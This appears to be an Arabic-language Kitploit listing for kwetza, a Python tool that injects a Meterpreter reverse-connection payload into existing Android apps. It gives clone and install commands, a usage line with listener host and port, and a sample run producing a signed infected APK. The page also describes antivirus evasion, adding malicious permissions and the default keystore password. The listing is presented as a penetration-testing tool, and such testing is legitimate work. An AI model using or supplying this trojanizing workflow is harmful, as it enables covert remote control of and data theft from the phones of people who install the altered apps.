Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
kwetza — نص برمجي بايثون لحقن تطبيقات أندرويد موجودة بحمولة Meterpreter. | Kitploit
أدوات/GitHubGitHub/sensepost/kwetza
أمان أندرويدتوليد الحمولةالاستغلالاختبار اختراق تطبيقات الجوالاختبار الاختراقتطوير الحمولات
GitHubsensepost/kwetza

kwetza

نص برمجي بايثون لحقن تطبيقات أندرويد موجودة بحمولة Meterpreter.

عرض المستودع
644239منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مقدمة

Arsenal

بقلم كريس لو روي (@brompwnie) [email protected]

Kwetza هي أداة تسمح لك بإصابة تطبيق Android موجود بحمولة Meterpreter.

ماذا تفعل؟

تقوم Kwetza بإصابة تطبيق Android موجود إما بقوالب حمولة مخصصة أو افتراضية لتجنب اكتشافها بواسطة برامج مكافحة الفيروسات. تتيح لك Kwetza إصابة تطبيقات Android باستخدام الأذونات الافتراضية للتطبيق المستهدف أو إضافة أذونات إضافية للحصول على وظائف إضافية.

أين يمكنني الحصول على المقال؟

يمكن العثور على الخطوات اليدوية التي تقوم Kwetza بأتمتتها هنا: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

الحصول على الكود

أولاً، احصل على الكود:

root@kitploit:~
git clone https://github.com/sensepost/kwetza.git

Kwetza مكتوبة بلغة Python وتتطلب BeautifulSoup والتي يمكن تثبيتها باستخدام Pip:

root@kitploit:~
pip install beautifulsoup4

تتطلب Kwetza تثبيت Apktool وجعله متاحًا عبر PATH الخاص بك. يمكن إعداد ذلك باستخدام تعليمات التثبيت الموجودة هنا: https://ibotpeaches.github.io/Apktool/install

الاستخدام

python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass

  • nameOfTheApkToInfect.apk = اسم ملف APK الذي ترغب في إصابته.
  • https/tcp = اختر إما اتصال HTTPS أو TCP
  • LHOST = IP المستمع الخاص بك.
  • LPORT = منفذ المستمع الخاص بك.
  • yes = أضف "yes" لحقن أذونات خبيثة إضافية في التطبيق، "no" لاستخدام الأذونات الافتراضية للتطبيق.
  • customClass = حدد نشاطًا مخصصًا هنا إذا كنت تريد أن تحقن Kwetza في هذا النشاط.
root@kitploit:~
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

معلومات

تم تطوير Kwetza للعمل مع Python 2.

بشكل افتراضي، ستستخدم Kwetza القالب ومخزن المفاتيح الموجودين في مجلد "payload" لحقن وتوقيع ملف apk المصاب.

إذا كنت ترغب في توقيع التطبيق المصاب بشهادتك الخاصة، فأنشئ مخزن مفاتيح جديد وضعه في مجلد "payload" وأعد تسميته ليطابق مخزن المفاتيح الحالي أو قم بتغيير المرجع في kwetza.py.

يمكن فعل الشيء نفسه لقوالب الحمولة.

كلمة المرور لمخزن المفاتيح الافتراضي هي، حسنًا، "password".

الترخيص

Kwetza مرخصة بموجب رخصة المشاع الإبداعي نسب المصنف - غير تجاري - المشاركة بالمثل 4.0 دولي (http://creativecommons.org/licenses/by-nc-sa/4.0).

قد تكون الأذونات التي تتجاوز نطاق هذه الترخيص متاحة على http://sensepost.com/contact.

تنزيل الأداة